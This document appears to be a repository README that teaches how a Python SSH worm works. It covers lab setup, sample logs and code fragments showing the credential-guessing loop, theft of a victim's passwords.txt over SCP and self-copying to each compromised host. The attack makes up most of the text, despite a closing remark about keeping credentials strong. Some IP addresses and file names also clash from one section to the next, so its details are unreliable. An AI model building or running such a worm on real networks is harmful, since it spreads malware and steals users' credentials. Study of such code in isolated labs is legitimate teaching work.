# Worm Our **worm** is implemented in the file `worm.py`. It tries to spread over the selected network via **SSH** connection and copy itself on the remote host. If the victim has a file **passwords.txt** in the home directory, it will obtain the file and send it back to the system of the attacker. #### Demonstration of behavior A valid infrastructure needs to be setup for this example. We need at least two hosts on the same network. To do this, it is recommended to setup two **virtual machines**, one for the attacker and one for the victim. To learn more about virtual machines, see [the guide to virtual machines](https://www.lifewire.com/virtual-machine-4147598). A free and popular virtualization tool is [Oracle VM VirtualBox](https://www.virtualbox.org/). For the system of the victim use [Metasploitable2](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) (a simple Linux VM often used for demostration of security vulnerabilities). Once you create both VMs, to connect them to the same network in VirtualBox go to _Setting->Network->AdapterN->Attached to_ and select Internal network. This must be done for both VMs. Now run both systems and log in. The default credentials on the **Metasploitable2** are ``` user: msfadmin pass: msfadmin ``` Make sure that you have this repo cloned on the system of the attacker. The last thing we have to do is to assign valid **IP addresses** to both machines. This can be done with the following command: ``` ip addr add [IP addr]/24 dev [Interface] ``` Assign **198.168.0.3** to the victim and **168.168.0.2** to the attacker. To make sure you have done everything correctly, make the systems ping each other. ``` Victim: ping 198.168.0.2 Attacker: ping 198.168.0.3 ``` If you can see the response, everything is fine and we can proceed to the actual demonstration. Make a simple file on the victim's system containing something like the following text and name it **passwords.txt**. This represents private file of the user on the vulnerable system. ``` My social media credentials --------------------------- user: user pass: mysecurepassword ``` Finally, we can execute our worm on the system of the attacker (`./worm.py`). This worm will try to access each host on the network and log in via **SSH**. To learn more about **SSH** see [the guide to SSH](https://medium.com/@Magical_Mudit/understanding-ssh-workflow-66a0e8d4bf65). If it succeeds, it copies itself on the vulnerable system and steals the file **passwords.txt** if the user has one. If everything was done correctly, you should see the following log of the worm. It has tried to log in to hosts **198.168.0.1** and **198.168.0.2** with various credentials and failed. But it has successfully connected to **2 users** on the system **198.168.0.3** and stole the password file from one of them. You should see this file in the same directory on the system of the attacker. ``` DEBUG:root:Trying to spread on the remote host: 198.168.0.1 DEBUG:root:The remote host refused connection with credentials user,user. DEBUG:root:The remote host refused connection with credentials root,root. DEBUG:root:The remote host refused connection with credentials msfadmin,msfadmin. DEBUG:root:Trying to spread on the remote host: 198.168.0.2 DEBUG:root:The remote host refused connection with credentials user,user. DEBUG:root:The remote host refused connection with credentials root,root. DEBUG:root:The remote host refused connection with credentials msfadmin,msfadmin. DEBUG:root:Trying to spread on the remote host: 198.168.0.3 DEBUG:root:The worm is succesfully connected to the remote host [user, user]. DEBUG:root:The victim did not have passwords.txt DEBUG:root:The remote host refused connection with credentials user,user. DEBUG:root:The remote host refused connection with credentials root,root. DEBUG:root:The worm is succesfully connected to the remote host [msfadmin, msfadmin]. DEBUG:root:The victim had passwords.txt ... ``` The creation of **worm** itself is very simple process as it is described below and anyone can do it just with a basic knowledge of programming and understandment of networking. That's why we should keep our systems updated, secured and credentials strong. #### How does it work? - Firstly, we create our **worm** and pass it a **network address** representing the network, on which it should spread. ```python worm = Worm('198.168.0.0') ``` - Then we call function _spread_via_ssh_, which tries to connect to each host on the network, establish an **SSH** connection and spread itself (while stealing the password file). ```python worm.spread_via_ssh() ``` - At the beginning, this method creates an **SSHClient** from _paramiko_ module that would help us to create the connection. ```python ssh = paramiko.SSHClient() ssh.get_missing_host_key_policy(paramiko.AutoAddPolicy()) ``` - Then it iterates over all host addresses on the network (implemented as generator _generate_addresses_on_network_). The worm contains property _credentials_, which represents combinations of usernames and passwords that the worm is willing to try. That means that it will try to login via **SSH** 3 times on each host. **SSH** uses port 22. ```python for remote_address in self.generate_addresses_on_network(): for user, passw in self.credentials: try: ssh.connect(remote_address, port=22, username=user, password=passw) ... ``` - If the connection fails, it is captured as an exception and the worm continues with another user or host. However, if the connection is established (as in the case of **198.162.0.3**), we can create an **SCP client** that will transmit our files. To learn more about **SCP**, see [the guide to SCP](https://en.wikipedia.org/wiki/Secure_copy). ``` scp_client = scp.SCPClient(ssh.get_transport()) - Now we can execute file transmition commands. One will obtain the password file and the second one will send the worm to the remote host. A name of the file is obtained from the system arguments. ```python scp_client.get('password.txt') scp_client.put(sys.argv[0]) ```